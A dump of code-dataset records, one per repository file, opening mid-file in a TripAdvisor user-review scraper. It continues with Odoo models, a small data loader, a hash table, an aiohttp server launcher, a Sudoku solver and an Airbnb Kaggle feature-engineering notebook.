Note that both dates should be in string format.\nResult: True - date_new is newer\n False - date_new is older or same date\n-------------------------------------------------------------------\"\"\"\ndef compare_date_isnewer(date_new, date_original):\n\tnew_date_new = time.strptime(date_new, \"%d/%m/%Y\")\n\tnew_date_original = time.strptime(date_original, \"%d/%m/%Y\")\n\t\n\tif (new_date_new <= new_date_original):\n\t\treturn False\n\telse:\n\t\treturn True\n\t\n\t\n\t\n\n\t\n\"\"\"----------------------------------\nFunction 1:\nGet username using uid \n-------------------------------------\"\"\"\ndef get_username(uid):\n\tif uid is None:\n\t\treturn\n\n\tresponse = requests.get(\"https://www.tripadvisor.com.sg/MemberOverlay?\", params={\"uid\":uid})\n\toverlay = BeautifulSoup(response.content, \"html.parser\")\n\tusername = overlay.find(\"a\")[\"href\"]\n\treturn username\n\n\"\"\"----------------------------------------\nFunction 2:\nGet user info using username\n-------------------------------------------\"\"\"\ndef get_user_info(username):\n\tif username is None:\n\t\treturn\n\t\n\tresponse = requests.get(\"https://www.tripadvisor.com.sg\" + username)\n\tcontainer = BeautifulSoup(response.content, \"html.parser\")\n\t\n\treviews = container.find(\"a\", {\"name\":\"reviews\"}).string\n\treviews = re.search(\"(.*) Review\", reviews).group(1)\n\tprint(\"Reviews: %s\" % reviews)\n\t\n\thelpful_votes = container.find(\"a\", {\"name\":\"lists\"})\n\tif helpful_votes is None:\n\t\thelpful_votes = 0\n\telse:\n\t\thelpful_votes = helpful_votes.string\n\t\thelpful_votes = re.search(\"(.*) Helpful\", helpful_votes).group(1)\n\tprint(\"Helpful vote: %s\" % helpful_votes)\n\t\n\ttravel_style=[]\n\ttempstyles = container.find_all(\"div\", class_=\"tagBubble\")\n\tfor a_style in tempstyles:\n\t\ttravel_style.append(a_style.get_text().strip())\n\tprint(\"Travel style: %s\" % travel_style)\n\t\n\tpoints = container.find(\"div\", class_=\"points\").string.strip()\n\tprint(\"Points: %s\" % points)\n\t\n\t\n\tlevel = container.find(\"div\", class_=\"level\")\n\tif level is None:\n\t\tlevel = 0\n\telse:\n\t\tlevel = level.find(\"span\").string\n\tprint(\"Level: %s\" % level)\n\t\n\tbadges = container.find_all(\"div\", class_=\"badgeItem\")\n\tthe_badges = []\n\tfor a_badge in badges:\n\t\tthe_badges.append(a_badge.get_text())\n\t\tprint(\"Badge: %s\" % a_badge.get_text())\n\t\n\treturn (int(reviews), int(helpful_votes), travel_style,\n\t\t\tint(points.replace(\",\", \"\")), int(level), the_badges)\n\n\n\"\"\"-----------------------\nFunction 3:\nProcess page\n--------------------------\"\"\"\ndef process_page(url, last_inserted_date):\n\tif url is None:\n\t\treturn\n\t\n\tprint(\"Processing %s\" % url)\n\t\n\tto_continue_scraping = True\n\t\n\t# Step 1: \n\thtml = requests.get(url)\n\tsoup = BeautifulSoup(html.content, \"html.parser\")\n\t\n\t# Step 2: Get the review_id\n\treview_ids = soup.find_all(\"div\", class_=\"reviewSelector\")\n\treview_id_list = list()\n\tfor a_reviewid in review_ids:\n\t\treview_id_list.append(a_reviewid[\"data-reviewid\"])\n\t#print(review_id_list)\n\t\n\t# Step 3: Convert review_id_list to commas seperated payload json\n\tpayload = \",\".join(review_id_list)\n\tpayload = {\n\t\t\"reviews\": payload\n\t}\n\t#print(\"Payload: %s\\n\" % payload)\n\t\n\t# Step 4: To expand out \"More\" so that the whole review can be seen\n\tr = 
requests.post(\n\t\turl='https://www.tripadvisor.com.sg/OverlayWidgetAjax?Mode=EXPANDED_HOTEL_REVIEWS&metaReferer=Attraction_Review',\n\t\tdata=payload,\n\t\theaders={\n\t\t\t'X-Requested-With': 'XMLHttpRequest'\n\t\t}\n\t)\n\t\n\t# Step 4: Get the new url\n\tsoup = BeautifulSoup(r.content, \"html.parser\")\n\t\t\n\t\n\tcontainer = soup.find_all(\"div\", class_=\"review\")\n\n\treview_list = []\n\tuser_profile_list = []\n\tfor a_container in container:\n\t\tglobal review_counter\n\t\treview_counter = review_counter+1;\n\t\tprint(\"S/N: %d\" % review_counter)\n\t\t\t\n\t\tscreen_name = a_container.find(\"span\", class_=\"scrname\").string\n\t\tscreen_name = remove_nonascii(screen_name)\n\t\tprint(\"Screen name: %s\" % screen_name)\n\t\t\n\t\tuser_location = a_container.find(\"span\", class_=\"userLocation\")\n\t\tif (user_location) is None:\n\t\t\tuser_location = \"None\"\n\t\telse:\n\t\t\tuser_location = remove_nonascii(user_location.string)\n\t\t\tuser_location = extract_country(str(user_location))\n\t\tprint(\"User location: %s\" % user_location)\n\t\t\n\t\t\n\t\t# Get rating: \t\n\t\trating = a_container.find(\"span\", class_=\"ui_bubble_rating\")[\"class\"][1][7]\n\t\tprint(\"Rating: %s\" % rating)\n\t\t\n\t\trating_date = a_container.find(\"span\", class_=\"ratingDate\")[\"title\"]\n\t\t\n\t\t# Condition: if entry date is older, stop processing all the remaining entries\n\t\ttemp_rating_date = datetime.datetime.strptime(rating_date, \"%d %B %Y\").strftime(\"%d/%m/%Y\")\n\t\tif not compare_date_isnewer(temp_rating_date, last_inserted_date):\n\t\t\tto_continue_scraping = False\n\t\t\tbreak;\n\t\t\t\n\t\tprint(\"Rating date: %s\" % rating_date)\n\t\t\n\t\ttitle = remove_nonascii(a_container.find(\"span\", class_=\"noQuotes\").string)\n\t\tprint(\"Title: %s\" % title)\n\t\n\t\t\n\t\t\n\t\tentry = remove_nonascii(a_container.find(\"p\", class_=\"partial_entry\").get_text())\n\t\tprint(\"Entry: %s\" % entry)\n\t\t\n\t\t\n\t\t\n\t\tuid = a_container.find(\"div\", class_=\"memberOverlayLink\")\n\t\tif uid is None:\n\t\t\tcontinue\n\t\tuid = uid[\"id\"]\t\n\t\tuid = re.search(\"UID_(.*)-SRC*\", uid).group(1)\n\t\tprint(\"uid: %s\" % uid)\n\t\tusername = str(get_username(uid))\n\t\tprint(\"username: %s\" % username)\n\t\t\n\t\t# Convert all parameters to their suitable types accordingly\n\t\tscreen_name = str(screen_name)\n\t\tuser_location = str(user_location)\n\t\trating = int(rating)\n\t\trating_date = datetime.datetime.strptime(rating_date, \"%d %B %Y\")\n\t\ttitle = str(title)\n\t\tentry = str(entry)\n\t\tuid = str(uid)\n\t\tusername = str(username)\n\t\t\n\t\t(reviews, helpful_votes, travel_style, points, level, the_badges) = get_user_info(username)\n\n\t\treview = {\n\t\t\t'_id' \t\t\t: uid ,\n\t\t\t'screen_name' \t: screen_name,\n\t\t\t'location' \t\t: user_location,\n\t\t\t'rating' \t\t: rating,\n\t\t\t'rating_date' \t: rating_date,\n\t\t\t'title' \t\t: title,\n\t\t\t'entry' \t\t: entry,\n\t\t\t'user_id' \t\t: username\n\t\t}\n\n\t\tuser_profile = {\n\t\t\t'_id' \t\t\t: username,\n\t\t\t'no_reviews' \t: reviews,\n\t\t\t'helpful_votes' : helpful_votes,\n\t\t\t'travel_styles' : travel_style,\n\t\t\t'points'\t\t: points,\n\t\t\t'level'\t\t\t: level,\n\t\t\t'badges'\t\t: the_badges\n\t\t}\n\n\t\t\n\t\t# Add to list\n\t\treview_list.append(review)\n\t\tuser_profile_list.append(user_profile)\n\t\t\n\t\tprint(\"\")\n\t\n\t# Send list to mongodb\n\tif (len(review_list)!=0):\n\t\tda.insert(\"review1\", review_list)\n\tif (len(user_profile_list)!=0):\n\t\tda.insert(\"user_profile1\", 
user_profile_list)\n\t\n\treturn to_continue_scraping\n\t\n\t\n\"\"\"-------------------------------------------------\nFunction 4:\n[1] Find out last page offset\n[2] Loop through all pages till the last page\n----------------------------------------------------\"\"\"\ndef loop_pages(url):\n\t# Step 1: Get last inserted date from mongodb\n\tlast_inserted_date = da.get_last_inserted_date()  # e.g. 22/08/2017\n\tif last_inserted_date is None:\n\t\tlast_inserted_date = \"01/01/1980\"\t\t# arbitrary fallback date\n\tprint(\"Last inserted date: %s\" % last_inserted_date)\n\t\n\t\n\t# Step 2: Find out the last page offset\n\tdata_offset=0\n\tcurrent_url = url.format(data_offset = 0)\n\t\n\thtml = requests.get(current_url)\n\tsoup = BeautifulSoup(html.content, \"html.parser\")\n\t\n\tlast_data_offset = int(soup.find(\"span\", class_=\"last\").get(\"data-offset\"))\n\tprint(last_data_offset)\n\t\n\t# Step 3: Loop through the pages till the last page\n\tfor current_offset in range(0, last_data_offset+1, 5):\n\t\tcurrent_url = url.format(data_offset = current_offset)\n\t\tto_continue_scraping = process_page(current_url, last_inserted_date)\n\t\t# Do not continue scraping\n\t\tif not to_continue_scraping:\n\t\t\tprint(\"\\nFinished scraping up to the last inserted date...\")\n\t\t\tbreak\n\t\t\n\t\t\n\"\"\"----------------------\nStart of main program\n-------------------------\"\"\"\nimport time, sys\ntry:\n\tloop_pages(url)\nexcept KeyboardInterrupt:\n\t#f.close()\n\tprint(\"\\t\\tFile closed successfully. Bye.\")\nexcept:\n\t#f.close()\n\tprint(\"\\t\\tException caught. File closed successfully. Bye.\")\n\t\n\tprint(sys.exc_info()[0])\n\traise\n\t\n\t\n\n\n\n\t\n\t\n","repo_name":"kdung/attractions_analysis","sub_path":"user_reviews_crawler.py","file_name":"user_reviews_crawler.py","file_ext":"py","file_size_in_byte":8958,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} {"seq_id":"32624300446","text":"from odoo import api, fields, models\n\n\nclass ImageTag(models.Model):\n    _inherit = \"image.tag\"\n\n    @api.model\n    def _get_default_apply_on(self):\n        active_model = self.env.context.get(\"active_model\")\n        return (\n            \"product\"\n            if active_model == \"product.image.relation\"\n            else \"category\"\n            if active_model == \"category.image.relation\"\n            else super()._get_default_apply_on()\n        )\n\n    apply_on = fields.Selection(\n        selection_add=[(\"product\", \"Product\"), (\"category\", \"Category\")],\n        ondelete={\"product\": \"cascade\", \"category\": \"cascade\"},\n    )\n","repo_name":"OCA/storage","sub_path":"fs_product_multi_image/models/image_tag.py","file_name":"image_tag.py","file_ext":"py","file_size_in_byte":626,"program_lang":"python","lang":"en","doc_type":"code","stars":53,"dataset":"github-code","pt":"76"} {"seq_id":"31296287716","text":"\"\"\" This script is used for loading and preliminarily processing the data. \"\"\"\nimport csv\nimport numpy as np\n\nDATA_PATH = \"bid_data.csv\"\n\ndef load_data(data_path):\n    \"\"\" Given a data_path, this function reads a csv file into a np.array. 
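\n\n    A minimal illustrative call (added; the names are the ones defined in this file):\n\n        data = load_data(DATA_PATH)   # -> np.ndarray of float rows like [value, bid]\n    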
\"\"\"\n with open(data_path) as csv_file: # Reads the csv file into a list.\n csv_reader = csv.reader(csv_file, delimiter=\",\")\n rows = list(csv_reader)\n \n del rows[0] # Remove the header, which are \"value\" and \"bid\".\n \n rows = remove_empty_rows(rows) # Remove empty rows.\n # Convert data from string to float format\n rows = [[float(a) for a in item] for item in rows]\n return np.array(rows)\n \n\ndef remove_empty_rows(array_x):\n \"\"\" Given an array_x, removes all rows that contain an empty data. \"\"\"\n output = [x for x in array_x if all(elem != \" \" for elem in x)]\n return output","repo_name":"tzk524/396_online_markets_project_2","sub_path":"load_data.py","file_name":"load_data.py","file_ext":"py","file_size_in_byte":862,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"6099821681","text":"from odoo import _, api, fields, models\nfrom odoo.exceptions import UserError\n\n\nclass HrPayslipLine(models.Model):\n _name = \"hr.payslip.line\"\n _inherit = \"hr.salary.rule\"\n _description = \"Payslip Line\"\n _order = \"contract_id, sequence\"\n\n slip_id = fields.Many2one(\n \"hr.payslip\", string=\"Pay Slip\", required=True, ondelete=\"cascade\"\n )\n date_from = fields.Date(\"Date From\", related=\"slip_id.date_from\", store=True)\n payslip_run_id = fields.Many2one(\n \"hr.payslip.run\", related=\"slip_id.payslip_run_id\", string=\"Payslip Batch\"\n )\n child_ids = fields.One2many(\n \"hr.payslip.line\", \"parent_line_id\", string=\"Child Payslip Lines\"\n )\n parent_line_id = fields.Many2one(\n \"hr.payslip.line\",\n string=\"Parent Payslip Line\",\n compute=\"_compute_parent_line_id\",\n store=True,\n )\n salary_rule_id = fields.Many2one(\"hr.salary.rule\", string=\"Rule\", required=True)\n employee_id = fields.Many2one(\"hr.employee\", string=\"Employee\", required=True)\n contract_id = fields.Many2one(\n \"hr.contract\", string=\"Contract\", required=True, index=True\n )\n rate = fields.Float(string=\"Rate (%)\", digits=\"Payroll Rate\", default=100.0)\n amount = fields.Float(digits=\"Payroll\")\n quantity = fields.Float(digits=\"Payroll\", default=1.0)\n total = fields.Float(\n compute=\"_compute_total\",\n string=\"Total\",\n digits=\"Payroll\",\n store=True,\n )\n allow_edit_payslip_lines = fields.Boolean(\n \"Allow editing\", compute=\"_compute_allow_edit_payslip_lines\"\n )\n\n def _compute_allow_edit_payslip_lines(self):\n self.allow_edit_payslip_lines = (\n self.env[\"ir.config_parameter\"]\n .sudo()\n .get_param(\"payroll.allow_edit_payslip_lines\")\n )\n\n @api.depends(\"parent_rule_id\", \"contract_id\", \"slip_id\")\n def _compute_parent_line_id(self):\n for line in self:\n if line.parent_rule_id:\n parent_line = line.slip_id.line_ids.filtered(\n lambda l: l.salary_rule_id == line.parent_rule_id\n and l.contract_id == line.contract_id\n and l.slip_id == line.slip_id\n )\n if parent_line and len(parent_line) > 1:\n raise UserError(\n _(\"Recursion error. 
Only one line should be parent of %s\")\n % line.parent_rule_id.name\n )\n line.parent_line_id = (\n parent_line[0].id if len(parent_line) == 1 else False\n )\n else:\n line.parent_line_id = False\n\n @api.depends(\"quantity\", \"amount\", \"rate\")\n def _compute_total(self):\n for line in self:\n line.total = float(line.quantity) * line.amount * line.rate / 100\n\n @api.model_create_multi\n def create(self, vals_list):\n for values in vals_list:\n if \"employee_id\" not in values or \"contract_id\" not in values:\n payslip = self.env[\"hr.payslip\"].browse(values.get(\"slip_id\"))\n values[\"employee_id\"] = (\n values.get(\"employee_id\") or payslip.employee_id.id\n )\n values[\"contract_id\"] = (\n values.get(\"contract_id\")\n or payslip.contract_id\n and payslip.contract_id.id\n )\n if not values[\"contract_id\"]:\n raise UserError(\n _(\"You must set a contract to create a payslip line.\")\n )\n return super(HrPayslipLine, self).create(vals_list)\n","repo_name":"OCA/payroll","sub_path":"payroll/models/hr_payslip_line.py","file_name":"hr_payslip_line.py","file_ext":"py","file_size_in_byte":3667,"program_lang":"python","lang":"en","doc_type":"code","stars":60,"dataset":"github-code","pt":"76"} +{"seq_id":"2078322927","text":"# Python program to check if the list contains three consecutive common numbers in Python\r\n\r\n# creating the array\r\narr = [4, 5, 5, 5, 3, 8, 22, 22, 22, 5]\r\n\r\n# size of the list\r\nsize = len(arr)\r\n\r\nfinal_list = []\r\n# looping till length - 2\r\nfor i in range(size - 2):\r\n if arr[i] == arr[i+1] and arr[i+1] == arr[i+2]:\r\n final_list.append(arr[i])\r\n\r\nprint(final_list)\r\n","repo_name":"Just2Deep/python_practice","sub_path":"Practice/Practice35.py","file_name":"Practice35.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"11829142527","text":"class Hashtable:\n def __init__(self):\n self.size = 10\n self.keys = [None]*self.size\n self.values = [None]*self.size\n\n def hashfunction(self,key):\n sum = 0\n for letter in range (len(key)):\n sum += ord(key[letter])\n return sum%self.size\n\n def put(self, key,value):\n index = self.hashfunction(key)\n while self.values[index]:\n if self.keys[index] == key:\n self.values[index] = value\n return\n index = (index+1)%self.size\n self.values[index] = value\n self.keys[index] = key\n\n def get(self,key):\n index = self.hashfunction(key)\n while self.keys[index]:\n if self.keys[index] == key:\n return self.values[index]\n index = (index+1)%self.size\n return None\n\nif __name__==\"__main__\":\n table = Hashtable()\n table.put(\"apple\",10)\n table.put(\"orange\", 20)\n table.put(\"car\", 30)\n table.put(\"table\", 40)\n print(table.get(\"H\"))\n print(table.get(\"apple\"))\n","repo_name":"RonitGoldental/data_structures","sub_path":"dictionary.py","file_name":"dictionary.py","file_ext":"py","file_size_in_byte":1059,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"42307318591","text":"import atexit\nimport logging\nimport logging.config\nimport os\nimport signal\nimport socket\nimport sys\nimport urllib.parse\n\nfrom aiohttp import web\nfrom er import app\nfrom er.util import options\n\noptions.define('listen', default='http://127.0.0.1:8888', help='Server listening address.')\noptions.define('prefork', default=1, help='Number of prefork workers.')\noptions.define('log_format',\n default=('%(log_color)s[%(levelname).1s '\n '%(asctime)s 
%(module)s:%(lineno)d]%(reset)s %(message)s'),\n               help='Log format.')\n\n_logger = logging.getLogger(__name__)\n\n\ndef main():\n    logging.config.dictConfig({\n        'version': 1,\n        'handlers': {\n            'console': {\n                'class': 'logging.StreamHandler',\n                'formatter': 'colored',\n            },\n        },\n        'formatters': {\n            'colored': {\n                '()': 'colorlog.ColoredFormatter',\n                'format': options.log_format,\n                'datefmt': '%y%m%d %H:%M:%S'\n            }\n        },\n        'root': {\n            'level': 'DEBUG' if options.debug else 'INFO',\n            'handlers': ['console'],\n        },\n        'loggers': {\n            'sockjs': {\n                'level': 'WARNING',\n            },\n        },\n        'disable_existing_loggers': False,\n    })\n    url = urllib.parse.urlparse(options.listen)\n    if url.scheme == 'http':\n        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n        sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, True)\n        host, port_str = url.netloc.rsplit(':', 1)\n        sock.bind((host, int(port_str)))\n    elif url.scheme == 'unix':\n        sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)\n        try:\n            os.remove(url.path)\n        except FileNotFoundError:\n            pass\n        sock.bind(url.path)\n    else:\n        _logger.error('Invalid listening scheme %s', url.scheme)\n        return 1\n    for i in range(1, options.prefork):\n        pid = os.fork()\n        if not pid:\n            break\n        else:\n            # bind pid now: a bare lambda would capture the variable late and\n            # kill only the last forked worker at exit\n            atexit.register(lambda pid=pid: os.kill(pid, signal.SIGTERM))\n    web.run_app(app.Application(), sock=sock, access_log=None)\n\nif __name__ == '__main__':\n    sys.exit(main())\n","repo_name":"twd2/EventRegistration","sub_path":"er/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2010,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} {"seq_id":"8930110633","text":"class SudokuSolver():\n    \"\"\"\n    This class solves Sudoku boards of a given rank and difficulty.\n    A Sudoku board is represented by an n^2 x n^2 grid where n is the rank of the board. \n    This means a typical 9x9 Sudoku grid would have rank n = 3.\n\n    The easiest method to generate a Sudoku board would be to first generate a 'solved' 9x9 Sudoku grid\n    and remove K elements from this grid. \n\n    Attributes:\n        rank (int): The rank of the Sudoku board to be generated. For an n^2 x n^2 board, its rank would be n.\n        debug (bool): Debug flag\n        board (list): List representation of the n^2 x n^2 game board to be solved. \n        analysis_board (list): n^2 x n^2 list storing all possible values that may\n            be entered into a given cell. \n    \"\"\"\n    _version = \"0.0.1\"\n    \n    def __init__(self, board, rank=3, debug=True):\n        self.board = board\n        self.rank = rank\n        self.grid_size = self.rank * self.rank\n        self.debug = debug\n\n        # Create a representation of the game board with a list of possible values mapped to each game board cell. \n        self.analysis_board = [ [[1,2,3,4,5,6,7,8,9] for i in range(self.grid_size)] for i in range(self.grid_size)]\n        pass\n\n    def display_board(self):\n        \"\"\" Display the game board. \"\"\"\n        for i in range(0, self.grid_size):\n            print(*self.board[i]) \n        print() \n        pass\n\n    def solve(self):\n        \"\"\"\n        Attempt to solve the provided Sudoku puzzle. Looks at each cell on the game board and determines which \n        values may be placed in them. If any cells have trivial entries (where only one value can be entered), enter them.\n\n        Returns:\n            (int): Number of iterations through the naive algorithm \n            required to find the given solution. \n        \"\"\"\n        if self.debug:\n            self.display_board()\n        \n        iterations = 1\n        while not self._check_board():\n\n            # Start with naive approach -- look at each cell on the game board and determine which \n            # values may be placed in them. 
If any cells have trivial entries, enter them. \n for i in range(0, self.grid_size):\n for j in range(0, self.grid_size):\n self.analysis_board[i][j] = self._analyze_cell(i, j)\n\n # If any trivial cases are found, fill in the cells with the corresponding values.\n for i in range(0, self.grid_size):\n for j in range(0, self.grid_size):\n if len(self.analysis_board[i][j]) == 1:\n if self.debug:\n print(\"(%d, %d) = %d\" % (i, j, self.analysis_board[i][j][0]))\n self.board[i][j] = self.analysis_board[i][j][0]\n self.analysis_board[i][j] = []\n\n if self.debug:\n print(\"Iteration %d\" % iterations)\n self.display_board()\n input()\n\n iterations += 1\n \n if self.debug:\n print(\"Solution\")\n self.display_board()\n \n return iterations\n\n def _analyze_cell(self, row_index, column_index):\n \"\"\"\n Analyze a given cell to determine what values may \n be validly placed within the cell. \n\n Args:\n row_index (int): Row of the cell to be analyzed. \n column_index (int): Column of the cell to be analyzed. \n Returns:\n (list): List of possible cell values. \n \"\"\"\n if self.board[row_index][column_index] != 0:\n return []\n\n possible_cell_values = [ 1, 2, 3, 4, 5, 6, 7, 8, 9 ]\n for value in range(1,10):\n if self._check_row_for_value(row_index, value) or self._check_column_for_value(column_index, value) or self._check_nonet_for_value(row_index, column_index, value):\n possible_cell_values.remove(value)\n return possible_cell_values\n \n def _check_row_for_value(self, row_index, value):\n \"\"\"\n Check to see if a value is present within a given row.\n\n Args:\n row_index (int): Row that will be checked for the provided value.\n value (int): Value to search the given row for.\n Returns:\n (bool): Flag indicated that value IS within the row.\n \"\"\"\n return value in self.board[row_index]\n\n def _check_column_for_value(self, column_index, value):\n \"\"\"\n Check to see if a value is present with a given column.\n\n Args:\n column_index (int): Column that will be checked for the provided value.\n value (int): Value to search the given column for.\n Returns:\n (bool): Flag indicated that value IS within the column.\n \"\"\"\n return value in [ self.board[i][column_index] for i in range(0, self.grid_size) ]\n\n def _check_nonet_for_value(self, row_index, column_index, value):\n \"\"\"\n Check to see if a value is present with a given nonet, (sub-3x3 grid).\n\n Args:\n row_index (int): Row that will be checked for the provided value.\n column_index (int): Column that will be checked for the provided value.\n value (int): Value to search the given column for.\n Returns:\n (bool): Flag indicated that value IS within the nonet.\n \"\"\"\n nonet_start_row = row_index // 3\n nonet_start_column = column_index // 3\n\n for i in range((3 * nonet_start_row), (3 * nonet_start_row) + 3):\n for j in range(3 * nonet_start_column, (3 * nonet_start_column) + 3):\n if self.board[i][j] == value: \n return True\n return False\n\n def _check_row_accuracy(self, row_index):\n return sum(self.board[row_index]) == 45\n\n def _check_column_accuracy(self, column_index):\n sum = 0\n for i in range(0, self.grid_size):\n sum += self.board[i][column_index]\n return sum == 45\n\n def _check_nonet_accuracy(self, row_index, column_index):\n sum = 0\n for i in range(row_index, row_index+3):\n for j in range(column_index, column_index+3):\n sum += self.board[i][j]\n return sum == 45\n\n def _check_board(self):\n \"\"\" \n Check the game board to see if a solution has been found. 
\n\n        A solution can be said to be 'found' if for all rows, columns, and nonets x the following holds:\n            1. The sum of all elements in x is 45. \n            2. x contains only the numbers 1 through 9, each exactly once (the sum test in (1) is a fast necessary check, though not by itself a guarantee of uniqueness). \n        \"\"\"\n        result = True\n\n        # Iterate through rows and columns, checking sum of elements\n        for i in range(0, self.grid_size):\n            result &= self._check_column_accuracy(i)\n            result &= self._check_row_accuracy(i)\n\n        if not result:\n            return False\n\n        # Iterate through nonets, checking sum of elements\n        for i in range(0, self.grid_size, 3):\n            for j in range(0, self.grid_size, 3):\n                result &= self._check_nonet_accuracy(i, j) \n        \n        return result\n\nclass KillerSudokuSolver(SudokuSolver):\n    _version = \"0.0.0\"\n    def __init__(self, board, rank=3, debug=True):\n        pass\n\n","repo_name":"afraz98/prodoku","sub_path":"prodoku/sudoku_solver.py","file_name":"sudoku_solver.py","file_ext":"py","file_size_in_byte":7310,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} {"seq_id":"20845543645","text":"\nimport numpy as np\nimport pandas as pd\nfrom sklearn.metrics import *\nfrom IPython.core.display import Image \nfrom sklearn.datasets import make_classification\nfrom sklearn.ensemble import ExtraTreesClassifier\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.tree import export_graphviz\nimport io\nfrom sklearn.preprocessing import Imputer\nfrom sklearn import preprocessing\nimport lightgbm as lgb\nfrom scipy.stats import mode\nimport re\nfrom datetime import datetime\nfrom lightgbm import plot_importance\nimport warnings\nwarnings.filterwarnings('ignore')\n\n\n# ---\n\n# ### Date read\n\n# In[7]:\n\nsessions = pd.read_csv(\"sessions.csv\")\ntest_users = pd.read_csv(\"test_users.csv\")\ntrain_users_2 = pd.read_csv(\"train_users_2.csv\")\n\n# ---\n\n# ### Date setting\n\n# In[8]:\n\n\ndef pre_age_set_data(train_users_2, test_users):\n    \n    check = pd.concat([train_users_2, test_users], ignore_index=True)\n    \n    check[\"first_affiliate_tracked\"] = check[\"first_affiliate_tracked\"].replace(np.nan, \"untracked\")\n    \n    check[\"date_account_created\"] = pd.to_datetime(check[\"date_account_created\"], format = \"%Y-%m-%d\")\n    check[\"timestamp_first_active\"] = pd.to_datetime(check[\"timestamp_first_active\"], format=\"%Y%m%d%H%M%S\")\n\n    s_lag = check[\"timestamp_first_active\"] - check[\"date_account_created\"]\n\n    check[\"lag_days\"] = s_lag.apply(lambda x : -1 * x.days)\n    check[\"lag_seconds\"] = s_lag.apply(lambda x : x.seconds)\n\n    s_all_check = (check['age'] < 120) & (check['gender'] != '-unknown-')\n\n    check['faithless_sign'] = s_all_check.apply(lambda x : 0 if x == True else 1)\n    \n    pre_age = check.drop(\"date_first_booking\",axis = 1)\n    \n    pre_age['date_account_created_y'] = pre_age[\"date_account_created\"].apply(lambda x : x.year)\n    pre_age['date_account_created_m'] = pre_age[\"date_account_created\"].apply(lambda x : x.month)\n    pre_age['date_account_created_d'] = pre_age[\"date_account_created\"].apply(lambda x : x.day)\n\n    pre_age['timestamp_first_active_y'] = pre_age[\"timestamp_first_active\"].apply(lambda x : x.year)\n    pre_age['timestamp_first_active_m'] = pre_age[\"timestamp_first_active\"].apply(lambda x : x.month)\n    pre_age['timestamp_first_active_d'] = pre_age[\"timestamp_first_active\"].apply(lambda x : x.day)\n\n    pre_age = pre_age.drop(\"date_account_created\" , axis=1)\n
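    # Added aside: the year/month/day features above could, I believe, also be\n    # built with pandas' vectorized .dt accessor, e.g.\n    #   pre_age['date_account_created_y'] = pre_age['date_account_created'].dt.year\n    # which avoids the row-wise apply/lambda calls.\n    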
pre_age = pre_age.drop(\"timestamp_first_active\" , axis=1)\n \n return check, pre_age\n\n\n# ---\n\n# # Gender\n\n# ### Gender predict data set\n\n# In[11]:\n\n\ndef pre_gen_predict_data(pre_age):\n \n pre_gen_sub = pre_age.filter(items = ['age', 'country_destination', 'id', 'gender'])\n pre_gen_dum = pre_age.filter(items = ['affiliate_channel', 'affiliate_provider',\n 'first_affiliate_tracked', 'first_browser', 'first_device_type',\n 'language', 'signup_app', 'signup_flow',\n 'signup_method', 'date_account_created_y', 'date_account_created_m',\n 'date_account_created_d', 'timestamp_first_active_y',\n 'timestamp_first_active_m', 'timestamp_first_active_d'])\n\n\n pre_gen_dum = pd.get_dummies(pre_gen_dum)\n pre_gen_dum_con = pd.concat([pre_gen_dum, pre_gen_sub], axis=1)\n pre_gen_dum_con[\"gender\"] = pre_gen_dum_con[\"gender\"].replace(['-unknown-', 'OTHER'], np.nan)\n\n pre_gen_mission = pre_gen_dum_con[pre_gen_dum_con[\"gender\"].isnull()].reset_index()\n pre_gen_train = pre_gen_dum_con[pre_gen_dum_con[\"gender\"].notnull()].reset_index()\n\n pre_gen_mission_test = pre_gen_mission.drop(\"index\", axis=1)\n pre_gen_train_test = pre_gen_train.drop(\"index\", axis=1)\n\n pre_gen_mission_test_drop = pre_gen_mission_test.drop(['id', 'age', 'country_destination', \"gender\"], axis=1)\n pre_gen_train_test_drop = pre_gen_train_test.drop(['id', 'age', 'country_destination', \"gender\"], axis=1)\n \n return pre_gen_mission_test, pre_gen_train_test, pre_gen_mission, pre_gen_train, pre_gen_mission_test_drop, pre_gen_train_test_drop\n\n\n# ### Gender predict LightGBM\n\n# In[12]:\n\n\ndef predict_gen_LightGBM(pre_gen_train_test_drop, pre_gen_train_test, pre_gen_mission_test_drop):\n\n X = pre_gen_train_test_drop\n y = pre_gen_train_test[\"gender\"]\n \n model_gen_lgb = lgb.LGBMClassifier(nthread=3)\n model_gen_lgb.fit(X,y)\n\n print(classification_report(y, model_gen_lgb.predict(pre_gen_train_test_drop)))\n model_gen_lgb = model_gen_lgb.predict(pre_gen_mission_test_drop)\n model_gen_lgb = pd.DataFrame(model_gen_lgb)\n \n return model_gen_lgb\n\n\n# ### Gender predict data make CSV\n\n# ---\n\n# # Age\n\n# ### Age predict data set\n\n# In[13]:\n\n\ndef pre_age_predict_data(pre_age):\n \n pre_age['age'] = pre_age['age'].fillna(-1)\n \n pre_age_sub = pre_age.filter(items = ['age', 'country_destination','id'])\n pre_age_dum = pre_age.filter(items = ['affiliate_channel', 'affiliate_provider',\n 'first_affiliate_tracked', 'first_browser', 'first_device_type',\n 'language', 'signup_app', 'signup_flow',\n 'signup_method', 'date_account_created_y', 'date_account_created_m',\n 'date_account_created_d', 'timestamp_first_active_y',\n 'timestamp_first_active_m', 'timestamp_first_active_d'])\n \n pre_age_dum = pd.get_dummies(pre_age_dum)\n pre_age_dum_con = pd.concat([pre_age_dum, pre_age_sub], axis=1)\n pre_age_dum_con[\"age\"] = pre_age_dum_con[\"age\"].replace(-1, np.nan)\n \n pre_age_mission = pre_age_dum_con[pre_age_dum_con[\"age\"].isnull()].reset_index()\n pre_age_train = pre_age_dum_con[pre_age_dum_con[\"age\"].notnull()].reset_index()\n \n pre_age_mission_test = pre_age_mission.drop(\"index\", axis=1)\n 